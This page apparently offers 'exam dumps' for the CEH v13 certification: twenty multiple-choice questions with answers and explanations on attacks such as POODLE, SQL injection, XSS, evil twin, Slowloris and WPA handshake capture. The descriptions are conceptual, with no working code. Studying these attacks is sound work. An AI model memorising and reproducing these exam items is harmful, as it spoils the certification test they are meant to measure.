ECCouncil 312-50v13 Certified Ethical Hacker v13 Exam Dumps and Practice Test Questions Set 6 Q101-120

Visit here for our full ECCouncil 312-50v13 exam dumps and practice test questions.

Question 101

Which technique allows an attacker to exploit misconfigured SSL/TLS by forcing downgrade to weak encryption?

A) POODLE
B) Heartbleed
C) Shellshock
D) Meltdown

Answer: A) POODLE

Explanation:

POODLE (Padding Oracle On Downgraded Legacy Encryption) is an attack that targets SSL 3.0 and certain TLS implementations to exploit weaknesses in block cipher padding. By forcing a connection to downgrade to SSL 3.0, attackers can manipulate padding bytes and eventually decrypt sensitive information, such as cookies or authentication tokens. The attack exploits the fact that SSL 3.0 does not verify padding in block cipher modes, allowing incremental extraction of plaintext data through repeated requests and analysis. POODLE is particularly relevant when clients and servers support SSL fallback, meaning an attacker can intentionally induce weaker protocol negotiation.

Heartbleed is a critical vulnerability in the OpenSSL library’s heartbeat extension that allows attackers to read memory from the affected server. It is not a downgrade attack; instead, it leaks sensitive information directly from server memory without requiring padding manipulation. Heartbleed is more about memory disclosure than SSL/TLS downgrade exploitation.

Shellshock exploits vulnerabilities in the Bash shell to execute arbitrary commands on affected systems. While dangerous and remote-executable, it is unrelated to SSL/TLS encryption weaknesses, padding, or downgrade negotiation. Shellshock targets command execution through environment variables, not network protocol weaknesses.

Meltdown is a CPU-level vulnerability that allows attackers to read privileged kernel memory from user-mode processes. It exploits speculative execution in processors and is unrelated to SSL/TLS or encryption negotiation. Meltdown does not interact with network protocols, padding, or cryptography.

The correct answer is POODLE because it specifically leverages SSL/TLS downgrade to weak cipher protocols to extract plaintext data through padding weaknesses. Unlike Heartbleed, Shellshock, or Meltdown, POODLE directly exploits protocol and cryptographic flaws, making it uniquely aligned with the scenario described. Its impact relies on both client-server protocol negotiation and the inherent flaw in SSL 3.0 padding verification, which distinguishes it from other vulnerabilities that target software execution, memory, or processor flaws.

Question 102

Which attack targets database-driven applications by manipulating SQL queries via user input?

A) SQL injection
B) Cross-site scripting
C) LDAP injection
D) XML external entity injection

Answer: A) SQL injection

Explanation: 

SQL injection is a classic web application vulnerability in which attackers input malicious SQL code into input fields, URL parameters, or cookies to manipulate backend database queries. The goal is often to extract sensitive data, bypass authentication, modify records, or execute administrative commands. SQL injection occurs when applications fail to validate or sanitize user input, allowing attackers to alter query logic. Techniques include union-based, error-based, blind, and time-based injections, depending on visibility and response behavior of the database. SQL injection exploits the trust between the application and the database layer.

Cross-site scripting (XSS) involves injecting malicious scripts into web pages, which execute in the browsers of other users. XSS attacks target client-side environments, focusing on stealing session tokens, credentials, or defacing content. While also exploiting input validation issues, XSS does not interact with the database directly, and it does not manipulate SQL queries.

LDAP injection targets applications that construct LDAP queries using unsanitized user input. By crafting malicious input, attackers can manipulate LDAP queries to bypass authentication, enumerate directory data, or escalate privileges. LDAP injection operates at the directory query level, not relational database systems, differentiating it from SQL injection.

XML external entity (XXE) injection involves exploiting vulnerabilities in XML parsers to read local files, access sensitive data, or cause denial-of-service conditions. XXE is related to XML processing, not SQL query manipulation. Its vector is XML input, not SQL statements.

The correct answer is SQL injection because it specifically manipulates SQL queries through user-supplied input to affect database behavior. While XSS, LDAP injection, and XXE also exploit insufficient input validation, only SQL injection directly interacts with relational database engines and allows data extraction, modification, or command execution within the database context.

Question 103

Which method is commonly used to intercept and read encrypted HTTPS traffic in a man-in-the-middle scenario?

A) SSL stripping
B) ARP spoofing
C) DNS poisoning
D) TCP SYN flood

Answer: A) SSL stripping

Explanation: 

SSL stripping is a man-in-the-middle (MITM) attack that downgrades HTTPS connections to HTTP by intercepting traffic between clients and servers. The attacker transparently converts secure HTTPS requests into unencrypted HTTP while maintaining a secure connection to the server. Victims unknowingly transmit sensitive information over HTTP, which the attacker can read and manipulate. SSL stripping leverages browser behavior and redirection mechanisms, exploiting users who do not verify HTTPS or rely on automatic redirection.

ARP spoofing is a network-level attack that sends falsified ARP messages to associate the attacker’s MAC address with another host’s IP, enabling MITM or session hijacking on LANs. While ARP spoofing can be used as part of an MITM setup, it does not directly strip SSL or decrypt HTTPS traffic on its own.

DNS poisoning manipulates DNS responses to redirect users to malicious domains. It enables phishing or traffic interception but does not downgrade HTTPS or remove encryption from client-server connections.

TCP SYN flood is a denial-of-service technique that overwhelms target systems by sending numerous SYN packets. It disrupts service availability but does not intercept, downgrade, or read encrypted communications.

The correct answer is SSL stripping because it uniquely allows an attacker to transparently convert secure HTTPS sessions into unencrypted traffic for interception. Unlike ARP spoofing, DNS poisoning, or SYN floods, SSL stripping specifically targets encrypted communication and client trust in HTTPS, enabling data theft without system crashes or redirection alone.

Question 104

Which attack exploits input validation flaws in web applications to retrieve arbitrary files from the server?

A) Directory traversal
B) SQL injection
C) Cross-site scripting
D) Clickjacking

Answer: A) Directory traversal

Explanation: 

Directory traversal, also known as path traversal, occurs when an application fails to properly validate user-supplied file paths. Attackers exploit this to access files outside the intended directory scope, often using sequences like ../ to navigate up the filesystem hierarchy. Directory traversal can expose sensitive files such as configuration files, password stores, or system data. The attack targets file system access rather than application logic, client-side execution, or UI interactions. Proper input validation and path sanitization prevent traversal vulnerabilities.

SQL injection manipulates database queries through user input to retrieve, modify, or delete data. While it exploits improper input validation, it targets databases rather than filesystem paths.

Cross-site scripting injects malicious scripts into web pages, targeting users’ browsers. It is a client-side attack that allows data theft, session hijacking, or UI manipulation. XSS does not retrieve server-side files directly.

Clickjacking tricks users into interacting with hidden or disguised interface elements. It exploits UI design and user behavior, not filesystem input handling or path validation.

The correct answer is directory traversal because it specifically targets improperly validated file paths to retrieve files from the server. Unlike SQL injection, XSS, or clickjacking, directory traversal operates at the filesystem layer and allows direct access to sensitive files beyond normal application permissions.

Question 105

Which attack injects malicious code into web pages, causing victim browsers to execute scripts without consent?

A) Cross-site scripting
B) SQL injection
C) LDAP injection
D) Command injection

Answer: A) Cross-site scripting

Explanation: 

Cross-site scripting (XSS) is a client-side web vulnerability where attackers inject malicious scripts into web pages. When other users load these pages, the browser executes the scripts in the context of the trusted site. XSS can be stored, reflected, or DOM-based. Stored XSS persists on the server, affecting multiple users, while reflected XSS appears in URLs or input fields. Attackers can steal cookies, perform actions on behalf of users, or deliver malware. XSS exploits insufficient output encoding and improper input validation.

SQL injection exploits input fields to manipulate backend SQL queries, enabling unauthorized data retrieval or manipulation. It targets server-side database logic, not browser execution.

LDAP injection manipulates directory service queries via unsanitized input. It affects LDAP-based authentication or data access, not client-side script execution.

Command injection exploits applications that pass unsanitized input to OS commands. Attackers can execute arbitrary commands on the server but do not inject code into the client browser.

The correct answer is cross-site scripting because it uniquely injects code into web pages that execute in the user’s browser. The other attacks focus on server-side logic or command execution, not browser-side script execution within a trusted context.

Question 106

Which wireless attack involves tricking clients into connecting to a rogue access point?

A) Evil twin attack
B) Bluejacking
C) Jamming
D) WEP cracking

Answer: A) Evil twin attack

Explanation: 

An evil twin attack is a wireless threat in which an adversary creates a rogue access point designed to mimic the characteristics of a legitimate Wi-Fi network so convincingly that users unknowingly connect to it. The attacker carefully duplicates the SSID, encryption type, signal strength, and even network behavior of a trusted access point. Once users connect, all their network traffic, including authentication exchanges, credentials, browsing activity, or application data, flows through the attacker-controlled device. This gives the attacker the ability to perform man-in-the-middle operations, inject malicious payloads, harvest login information, or manipulate cleartext data. Many devices automatically reconnect to networks they have used before, and this automatic trust is exploited in evil twin scenarios. Public Wi-Fi networks such as those in airports, cafes, or hotels are particularly susceptible, because users often do not verify certificate warnings or validate the true source of the wireless signal.

Bluejacking, listed as option B, is a Bluetooth-based technique used mostly for sending unsolicited messages or vCards to nearby devices. It is often considered more of a prank than an attack and involves Bluetooth advertising rather than Wi-Fi impersonation. Since bluejacking does not imitate access points and does not trick users into joining a rogue network, it is unrelated to evil twin behavior.

Option C, jamming, refers to the deliberate transmission of interference signals to overwhelm a wireless channel, causing legitimate devices to lose connectivity. This is a denial-of-service technique and does not involve creating rogue access points or deceiving users. While jamming can complement other attacks by forcing clients to reconnect, it alone does not cause users to join an attacker’s access point.

Option D, WEP cracking, targets the weaknesses of the obsolete WEP encryption protocol. Using techniques like IV collection and statistical analysis, attackers recover the encryption key to gain access to the network. This does not involve cloning or impersonating another AP, and no deception of client devices occurs.

Therefore, the correct answer is the evil twin attack, because it uniquely depends on imitating a legitimate wireless network to lure victims into connecting and exposing their traffic.

Question 107

Which malware records keystrokes to capture passwords, credit cards, or sensitive data?

A) Keylogger
B) Ransomware
C) Worm
D) Botnet

Answer: A) Keylogger

Explanation:

A keylogger is a specialized type of malware designed specifically to record every keystroke typed on a victim’s device. It can capture usernames, passwords, personal identification numbers, credit card details, email messages, and other sensitive information entered via the keyboard. Keyloggers exist in two primary forms: hardware keyloggers, which physically sit between the keyboard and computer, and software keyloggers that install themselves within the operating system, often with root-level permissions. Some advanced keyloggers capture far more than raw keystrokes; they may take periodic screenshots, record clipboard contents, intercept network communications, or monitor application behavior. They typically run invisibly in the background, avoiding detection by hiding their processes, disguising their file names, or injecting themselves into trusted applications. Attackers deploy keyloggers through phishing emails, malicious downloads, drive-by exploits, or Trojanized software. Because keyloggers directly harvest credential input at the source, they can bypass encrypted communication channels, making them extremely valuable for attackers conducting credential theft, financial fraud, or identity theft.

Ransomware, option B, operates very differently. Its primary purpose is to encrypt a victim’s files or lock access to the system, followed by a demand for payment. While ransomware is financially motivated, it is not designed to monitor keystrokes. Its destructive nature contrasts with the stealth-oriented, data-harvesting design of keyloggers.

Option C, a worm, is a self-replicating piece of malware that spreads across networks without needing user interaction. Although a worm may carry a keylogger as a payload, the worm itself is not a keylogger. Its primary purpose is propagation rather than keystroke collection.

Option D, a botnet, refers to a network of compromised devices controlled remotely by an attacker through a command-and-control (C2) server. Botnets can perform distributed denial-of-service attacks, send spam, or distribute malware. While bots may deploy keyloggers on infected hosts, the botnet is the infrastructure, not the keylogging tool itself.

Therefore, the correct answer is the keylogger, because it specifically captures keystroke data, whereas ransomware, worms, and botnets operate with different primary objectives.

Question 108

Which vulnerability allows attackers to execute arbitrary OS commands via web application input?

A) Command injection
B) Cross-site scripting
C) SQL injection
D) Directory traversal

Answer: A) Command injection

Explanation:

Command injection occurs when a web application improperly handles untrusted input and passes it directly to the underlying operating system as part of a system call or shell command. When input parameters are not sanitized or validated, attackers can append malicious commands using characters such as semicolons, pipes, or logical operators. As a result, the attacker gains the ability to execute arbitrary OS-level commands with the same privileges as the web server process. This can allow file manipulation, user account modification, extraction of sensitive information, pivoting deeper into the network, or even obtaining full system compromise. Command injection is especially dangerous in scripts or applications that use system utilities, such as network diagnostic tools, file compressors, or administrative shell commands. Because the vulnerability leverages the underlying OS directly, the impact is severe and may bypass database or application-level protections altogether.

Option B, cross-site scripting (XSS), involves the injection of client-side scripts, usually JavaScript, into content that is later rendered by a victim’s browser. XSS targets end users rather than the operating system of the server hosting the application. Though harmful, its execution environment is the browser, not the OS terminal.

Option C, SQL injection, manipulates SQL queries by injecting malicious database commands. While SQL injection can allow attackers to read, modify, or delete database records, escalate privileges, or perform lateral movement via stored procedures, it does not inherently permit OS command execution unless the database engine has specific unsafe configurations. Its primary domain is the database layer, not the operating system shell.

Directory traversal, option D, uses crafted file path sequences such as “../” to access directories outside the intended web root. This may expose configuration files, logs, or sensitive data but does not allow execution of operating system commands. Its scope is limited to unauthorized file access rather than command execution.

Therefore, command injection is the correct answer because it uniquely enables attackers to run arbitrary OS commands through vulnerable web application inputs.

Question 109

Which DoS attack uses ICMP echo requests to flood a network, often amplifying traffic via broadcast addresses?

A) Smurf attack
B) SYN flood
C) Ping of Death
D) Teardrop attack

Answer: A) Smurf attack

Explanation:

A Smurf attack is a distributed denial-of-service technique that exploits the behavior of devices responding to ICMP echo requests sent to a broadcast address. The attacker sends ICMP echo request packets to a network’s broadcast address, but spoofs the source IP to match the victim’s address. When the broadcast address receives such packets, all devices on that network respond with ICMP echo replies, sending the traffic to the spoofed victim. This results in an amplified flood of traffic targeting the victim’s system or network, quickly overwhelming available bandwidth or processing capacity. The effectiveness of the attack relies on misconfigured networks that allow directed broadcast traffic and on hosts that respond to ICMP echo requests. Modern networks mitigate such attacks by disabling broadcast forwarding and applying ingress and egress filtering on routers. However, environments lacking these defenses remain vulnerable to Smurf-style amplification.

Option B, the SYN flood, exploits the TCP three-way handshake by sending a large number of SYN packets without completing the handshake. This consumes server resources but does not rely on ICMP or broadcast amplification. It targets TCP state exhaustion, not ICMP volumetric amplification.

Option C, the Ping of Death, sends oversized or malformed ICMP packets that cause buffer overflows or crashes on vulnerable systems. It is distinct from Smurf attacks because it focuses on malformed packet delivery, not amplification or spoofing.

Option D, the Teardrop attack, uses overlapping or improperly fragmented IP packets to overwhelm systems during packet reassembly. This exploits weaknesses in the reassembly process rather than utilizing broadcast traffic or ICMP echo replies.

Therefore, the Smurf attack is the correct answer because it uniquely combines ICMP echo requests, source IP spoofing, and broadcast amplification to create a powerful DoS effect.

Question 110

Which type of scan sends TCP packets with SYN flags but does not complete the handshake to stealthily detect open ports?

A) SYN scan
B) Null scan
C) XMAS scan
D) Full connect scan

Answer: A) SYN scan

Explanation:

A SYN scan, also known as a half-open scan, is a reconnaissance technique used to determine which TCP ports are open on a target system. It works by sending a SYN packet to a port and analyzing the response. If the port is open, the target responds with a SYN/ACK packet. Instead of completing the TCP three-way handshake by sending an ACK, the scanner immediately sends an RST packet to tear down the connection before it fully establishes. This makes the scan faster and stealthier because many systems and intrusion detection devices log only fully established connections. By avoiding the full handshake, the SYN scan reduces the footprint of network enumeration activities, making it a preferred technique for both penetration testers and attackers.

Option B, the null scan, sends TCP packets with no flags set at all. It relies on specific OS responses to determine port states, but its behavior is inconsistent across platforms. It does not involve SYN packets and is generally less reliable and more easily detected than SYN scans.

Option C, the XMAS scan, sends packets with FIN, PSH, and URG flags enabled simultaneously. Like the null scan, it relies on how operating systems respond to unusual flag combinations. Although it is used for stealth scanning, it does not use the half-open SYN-based methodology.

Option D, the full connect scan, performs the entire three-way handshake and fully opens a TCP connection to each port. This approach is more detectable, slower, and creates extensive logs, because every connection appears as a legitimate session on the target device.

Therefore, the correct answer is the SYN scan, because it uniquely sends SYN packets without completing the handshake, combining efficiency with stealth.

Question 111

Which attack involves overwhelming a web server by holding many HTTP connections open simultaneously?

A) Slowloris attack
B) SYN flood
C) UDP flood
D) Ping of Death

Answer: A) Slowloris attack

Explanation:

The Slowloris attack is a specialized type of application-layer denial-of-service technique designed to exhaust a web server’s concurrent connection capacity by opening numerous HTTP sessions and keeping them alive for as long as possible. Instead of sending complete requests, the attacker sends partial HTTP headers at extremely slow intervals, preventing the server from timing the session out or freeing the resources associated with it. Because most web servers, especially older or thread-based ones like Apache, allocate a thread or process per open connection, Slowloris gradually immobilizes the server by consuming all available connections. Legitimate clients eventually become unable to establish new sessions, effectively denying access without requiring high bandwidth. A key strength of Slowloris is its low profile; it can be launched with minimal traffic, making detection more difficult. Rate limiting, adjusting header timeout values, deploying reverse proxies, or using modern event-driven servers are common mitigation strategies.

SYN flood, listed as option B, is also a denial-of-service attack but operates at the transport layer. Attackers send numerous SYN packets to initiate TCP handshakes but never complete them, leaving the server with a backlog of half-open connections. This consumes resources but does not use slow or incomplete HTTP requests like Slowloris does.

UDP flood, option C, overwhelms the target by sending massive volumes of UDP packets to random ports. The aim is to saturate bandwidth or force the server to issue unreachable replies. This is a volumetric network-layer method, not an application-layer slow-request attack.

Ping of Death, option D, sends malformed or oversized ICMP packets that exceed maximum IP packet sizes. This historically caused buffer overflows or crashes on vulnerable systems. It does not involve connection exhaustion or manipulating HTTP headers.

The correct answer is Slowloris attack because it uniquely targets web servers by intentionally holding multiple HTTP connections open with incomplete requests, a behavior not shared by SYN flood, UDP flood, or Ping of Death.

Question 112

Which technique allows attackers to steal sensitive information from a browser session using malicious scripts?

A) Cross-site scripting
B) SQL injection
C) Man-in-the-middle attack
D) Directory traversal

Answer: A) Cross-site scripting

Explanation: 

Cross-site scripting, or XSS, is an attack where malicious scripts—typically JavaScript—are injected into otherwise trusted web pages and executed by a victim’s browser. The key strength of XSS is that it allows an attacker to run unauthorized code within the security context of a website the victim is visiting, enabling theft of cookies, session identifiers, authentication tokens, personal data, or browsing information. XSS occurs when an application improperly validates or sanitizes user input before rendering it. Attackers exploit this by embedding harmful scripts in fields like search boxes, comment sections, or URLs. When another user loads the affected page, the malicious script executes automatically. XSS appears in multiple forms: stored XSS persists on the server and affects anyone who visits the corrupted page; reflected XSS returns the malicious code through immediate responses such as search results; and DOM-based XSS manipulates client-side scripts and the Document Object Model without requiring changes to server-side output. Preventing XSS requires output encoding, proper input handling, use of Content Security Policy, secure cookie flags, and frameworks with built-in sanitization.

SQL injection, option B, targets server-side databases by manipulating SQL queries. It does not involve executing malicious scripts on a victim’s browser or stealing session data through script injection.

A man-in-the-middle attack, option C, can intercept or alter traffic between two communicating parties. While capable of stealing information in transit, it does not rely on injecting scripts that execute within the browser environment.

Directory traversal, option D, attempts to access restricted files by exploiting improper path validation. It impacts file systems rather than browser sessions and does not involve script execution within web pages.

The correct answer is cross-site scripting because it uniquely involves the execution of attacker-supplied scripts in a user’s browser—behavior not exhibited by SQL injection, MITM, or directory traversal.

Question 113

Which attack involves tricking users into revealing sensitive information through fraudulent emails?

A) Phishing
B) Vishing
C) Smishing
D) Shoulder surfing

Answer: A) Phishing

Explanation: 

Phishing is a widespread and persistent form of social engineering in which attackers craft fraudulent emails that mimic legitimate organizations, institutions, or individuals to deceive recipients into revealing sensitive data. These emails often imitate branding, formatting, tone, and URL structures to appear authentic. Attackers may prompt users to click on malicious links leading to fake login portals, download harmful attachments, or respond with confidential information such as usernames, passwords, financial details, or personal identification data. Phishing campaigns may be broad and generic or highly targeted, such as spear-phishing, where attackers tailor messages to specific individuals using personalized details. Business email compromise is another variation in which attackers pose as executives or vendors to request unauthorized transfers. Preventing phishing requires a combination of user awareness, email filtering solutions, DNS-based authentication controls such as SPF, DKIM, and DMARC, and practices like multi-factor authentication to limit the damage from stolen credentials.

Vishing, option B, is similar in psychological intent but uses voice calls instead of email. Attackers impersonate banks, support centers, or government agencies to manipulate victims into providing sensitive data over the phone.

Smishing, option C, uses SMS messages to lure victims into clicking malicious links or sharing private information. It is mobile-oriented and text-based, not email-based.

Shoulder surfing, option D, relies on physical observation. Attackers visually capture sensitive information like PINs, passwords, or screen contents, which does not involve digital deception or fraudulent messages.

The correct answer is phishing because it specifically uses fraudulent emails to mislead recipients, whereas vishing, smishing, and shoulder surfing operate through entirely different communication channels and methods.

Question 114

Which attack exploits weaknesses in the WEP protocol to recover encryption keys?

A) WEP cracking
B) WPA2 cracking
C) Evil twin attack
D) Bluejacking

Answer: A) WEP cracking

Explanation: 

WEP cracking targets weaknesses in the WEP encryption protocol for Wi-Fi networks. WEP uses weak initialization vectors (IVs) and RC4 encryption, which are vulnerable to statistical attacks. Attackers capture packets, analyze IVs, and recover the shared key. Tools like Aircrack-ng automate this process. Because WEP does not use strong key management, recovery can be quick, allowing unauthorized access to the network. WEP cracking demonstrates vulnerabilities inherent to outdated encryption standards and emphasizes the importance of upgrading to WPA2 or WPA3.

WPA2 cracking targets modern encryption using stronger algorithms like AES. While possible, it is more complex and typically requires brute-force or dictionary attacks rather than IV analysis.

Evil twin attacks involve creating rogue access points to trick clients into connecting. While often paired with credential theft, it does not exploit WEP encryption weaknesses.

Bluejacking sends unsolicited messages to nearby Bluetooth devices. It is unrelated to Wi-Fi encryption or key recovery.

The correct answer is WEP cracking because it specifically exploits weak initialization vectors in WEP to recover keys. WPA2 cracking, evil twin, and bluejacking involve different techniques, targets, or technologies.

Question 115

Which attack captures traffic on a local network to analyze sensitive information?

A) Packet sniffing
B) ARP spoofing
C) SQL injection
D) Cross-site scripting

Answer: A) Packet sniffing

Explanation: 

Packet sniffing is a network reconnaissance technique where attackers capture data packets traveling across a network. Tools like Wireshark or tcpdump allow detailed inspection of protocols, headers, payloads, and credentials. It is particularly effective on unencrypted traffic, where attackers can view sensitive information such as passwords, emails, or session tokens. Packet sniffing is passive and generally undetectable if the network uses hubs or compromised switches. It can serve as a precursor for MITM attacks or credential theft.

ARP spoofing is a technique to associate the attacker’s MAC address with a legitimate IP, enabling MITM attacks. While it may lead to sniffing opportunities, ARP spoofing is an active attack, unlike passive sniffing.

SQL injection targets database-driven applications to manipulate queries and retrieve data. It is application-level exploitation, unrelated to network packet capture.

Cross-site scripting injects scripts into web pages to execute in victim browsers, targeting client-side security rather than network-level traffic.

The correct answer is packet sniffing because it uniquely involves capturing network traffic for analysis. ARP spoofing may enable sniffing, but packet sniffing itself is the primary tool for analyzing sensitive information directly.

Question 116

Which attack uses unsolicited Bluetooth messages to nearby devices?

A) Bluejacking
B) Bluesnarfing
C) BlueBump
D) BlueBugging

Answer: A) Bluejacking

Explanation: 

Bluejacking is a Bluetooth-based technique that involves sending unsolicited messages, typically short texts or digital contact cards, to nearby discoverable devices. It originated as a harmless prank, but over time, security professionals began using it as an example of how Bluetooth features can be abused to create social engineering opportunities. Bluejacking does not require pairing or authentication because the messages are usually delivered using public Bluetooth profiles such as OBEX. It cannot access sensitive data, modify system settings, or compromise device integrity. However, it can still be used to distract users, deliver deceptive messages, or convince individuals to take specific actions, such as clicking a malicious link or engaging in communication with the attacker. Although the impact is relatively low compared to more sophisticated Bluetooth attacks, Bluejacking demonstrates how wireless communication technologies are vulnerable to privacy intrusions when devices remain discoverable.

Bluesnarfing, option B, is far more severe. It exploits vulnerabilities in Bluetooth implementations to gain unauthorized access to data stored on a device, such as contacts, text messages, call logs, and files. Unlike Bluejacking, Bluesnarfing directly compromises confidentiality by extracting private information without the owner’s knowledge. This makes it an actual security breach rather than an annoyance or prank.

Option C, BlueBump, manipulates Bluetooth pairing by forcing a previously paired device to re-establish trust with the attacker-controlled device. This can give the attacker extended interaction opportunities, enabling them to potentially intercept data or maintain unauthorized connections. Its operation focuses on authentication abuse, not message delivery.

Option D, BlueBugging, is one of the most advanced Bluetooth attacks. It allows an attacker to take remote control of a victim’s device by exploiting firmware vulnerabilities or misconfigurations. Once successful, attackers can make phone calls, send messages, monitor audio, or manipulate device functions. BlueBugging is a highly invasive compromise that goes beyond unsolicited communication.

Therefore, Bluejacking is the correct answer because it uniquely involves sending unsolicited Bluetooth messages to nearby devices. The other listed attacks perform unauthorized data access, takeover, or reconnection manipulation rather than simple message sending.

Question 117

Which attack manipulates ARP tables on a LAN to intercept or redirect traffic?

A) ARP spoofing
B) DNS poisoning
C) SYN flood
D) Ping of Death

Answer: A) ARP spoofing

Explanation:

ARP spoofing, also known as ARP poisoning, is a network attack in which an adversary sends forged ARP messages across a local area network. The goal is to associate the attacker’s MAC address with the IP address of another device, such as a default gateway or another host. Because ARP lacks authentication, devices accept the falsified entries and update their ARP tables, causing traffic intended for the legitimate host to be sent to the attacker instead. Once this redirection is established, the attacker can intercept, modify, or block communications. ARP spoofing is often used as a stepping stone for man-in-the-middle attacks, credential theft, session hijacking, or traffic manipulation. It highlights a fundamental weakness in the ARP protocol design: trust in unsolicited messages.

DNS poisoning, option B, operates at a different layer of networking. It manipulates DNS records so users attempting to reach legitimate websites are redirected to fraudulent servers. While effective for redirection attacks, it does not interact with ARP tables and does not control LAN-level MAC–IP associations.

Option C, SYN flood, is a denial-of-service attack that overwhelms servers by sending numerous SYN packets without completing the TCP three-way handshake. This exhausts connection tables and prevents legitimate users from accessing services. Although disruptive, it does not influence local address resolution or enable traffic interception.

Ping of Death, option D, involves sending oversized or malformed ICMP packets to exploit vulnerabilities in older systems that may crash or behave unpredictably when handling such packets. It is destructive but unrelated to ARP manipulation.

Thus, ARP spoofing is the correct answer because it specifically targets LAN-based ARP tables to intercept or redirect traffic, whereas the other attacks affect DNS, TCP handshake resources, or ICMP packet processing.

Question 118

Which attack targets weak session management to impersonate a legitimate user?

A) Session hijacking
B) Phishing
C) SQL injection
D) ARP spoofing

Answer: A) Session hijacking

Explanation:

Session hijacking occurs when an attacker takes over a valid session belonging to a legitimate user, typically by stealing or predicting session tokens used to authenticate ongoing interactions. These tokens may be stored in cookies, URLs, hidden fields, or request headers. When session management is poorly implemented—such as using predictable session IDs, transmitting tokens without encryption, or failing to invalidate old sessions—attackers can gain unauthorized access. Methods used to obtain tokens include packet sniffing on unencrypted networks, exploiting cross-site scripting (XSS) to exfiltrate cookies, man-in-the-middle interception, or brute-forcing weak token values. Once the attacker has the session token, they impersonate the legitimate user and access sensitive information, perform transactions, or modify account settings. This makes session hijacking one of the most serious web application security threats because it bypasses authentication entirely.

Phishing, option B, involves tricking users into voluntarily revealing personal information through deceptive emails or fake websites. While phishing can eventually result in session compromise if victims provide credentials, it is not a direct exploitation of session weaknesses.

SQL injection, option C, allows attackers to manipulate backend database queries by injecting malicious SQL statements. Although SQL injection can lead to authentication bypass or data theft, it targets server-side database logic rather than session token management.

ARP spoofing, option D, manipulates local network address mappings. While it can be used to intercept session tokens in transit, it is not inherently a session management attack.

Therefore, session hijacking is the correct answer because it directly targets weaknesses in session handling to impersonate a user.

Question 119

Which wireless attack captures WPA/WPA2 handshakes to attempt offline password cracking?

A) WPA handshake capture
B) WEP cracking
C) Evil twin attack
D) Bluejacking

Answer: A) WPA handshake capture

Explanation:

WPA handshake capture focuses on intercepting the four-way handshake that occurs whenever a client device connects or reconnects to a WPA or WPA2-protected wireless network. This handshake contains cryptographic information that validates both the client and the access point. Although the handshake does not directly expose the pre-shared key (PSK), attackers can capture it using tools like Airodump-ng and then perform offline dictionary, brute-force, or rule-based attacks to guess the PSK. Since the cracking process occurs offline, there is no interaction with the target network after the handshake is collected, reducing the chances of detection. To capture handshakes, attackers often force clients to reconnect by sending deauthentication frames, prompting them to re-initiate the handshake sequence. This makes WPA handshake capture one of the primary methods used in password-based Wi-Fi attacks today.

WEP cracking, option B, targets the obsolete WEP encryption algorithm by exploiting vulnerabilities involving weak initialization vectors and RC4 key scheduling. It does not involve WPA/WPA2 handshakes or offline PSK cracking.

Evil twin attacks, option C, involve creating rogue access points that mimic legitimate networks to trick users into connecting. While these attacks may capture credentials or force connections, they do not specifically focus on capturing WPA handshakes for password cracking.

Bluejacking, option D, deals with sending unsolicited Bluetooth messages and has no relevance to Wi-Fi authentication or WPA security.

Thus, WPA handshake capture is the correct answer because it uniquely targets WPA/WPA2 authentication frames for offline password recovery.

Question 120

Which attack exploits misconfigured network devices to retrieve sensitive routing information?

A) SNMP enumeration
B) SYN flood
C) DNS amplification
D) Slowloris attack

Answer: A) SNMP enumeration

Explanation:

SNMP enumeration is a reconnaissance technique in which attackers query network devices such as routers, switches, firewalls, and servers using the Simple Network Management Protocol. When SNMP is misconfigured—such as using default or weak community strings like “public” or “private”—an attacker can access extensive system details. Retrieved information may include routing tables, ARP caches, interface statistics, open ports, SNMP configuration parameters, and detailed device descriptions. This intelligence helps attackers map network topology, understand device roles, identify potential misconfigurations, and plan more advanced attacks such as traffic redirection, denial-of-service, or credential harvesting. SNMP enumeration is dangerous because administrators often forget to secure SNMPv1 and SNMPv2c, both of which lack encryption and rely solely on community strings for authentication. If left exposed, attackers can gather sensitive routing information without actively exploiting vulnerabilities.

A SYN flood, option B, is a resource-exhaustion attack that overwhelms a server’s TCP connection table by sending numerous SYN packets without completing the handshake. It does not retrieve routing information.

DNS amplification, option C, leverages open DNS resolvers to magnify response traffic toward a victim, causing a volumetric denial-of-service attack. It is unrelated to device enumeration or routing data extraction.

Slowloris, option D, targets web servers by keeping numerous HTTP connections open and incomplete, causing resource exhaustion. It also does not expose routing information.

Therefore, SNMP enumeration is the correct answer because it specifically exploits poorly secured SNMP services to gather sensitive routing and configuration data.